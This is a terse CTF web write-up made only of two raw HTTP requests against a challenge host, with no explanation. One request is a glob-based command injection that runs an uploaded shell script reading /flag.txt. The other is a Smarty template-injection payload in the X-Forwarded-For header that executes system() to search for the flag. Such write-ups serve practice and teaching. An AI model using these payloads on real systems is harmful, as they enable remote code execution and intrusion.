某卫生CTF-web-WriteUP

POST /?shell=.%20%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%3F%3F%3F%5B%40-%5B%5D HTTP/1.1Host: cloudeci1.ichunqiu.comContent-Length: 206Cache-Control: max-age=0Origin: nullUpgrade-Insecure-Requests: 1DNT: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrLrIdoDjGOhHKAwUUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryrLrIdoDjGOhHKAwUContent-Disposition: form-data; name="upload"; filename="a.txt"Content-Type: text/plain
#! /bin/sh
cat /flag.txt------WebKitFormBoundaryrLrIdoDjGOhHKAwU--

POST / HTTP/1.1Host: eci-.cloudeci1.ichunqiu.comPragma: no-cacheCache-Control: no-cacheOrigin: http://eci-.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36DNT: 1Accept: */*Via: 1.1 vegurX-Forwarded-For: {assert($smarty.post.a)}Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: __jsluid_h=f8c4073200e23f9fef8f14be5a907849Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 31
a=system("find / -name 'flag'")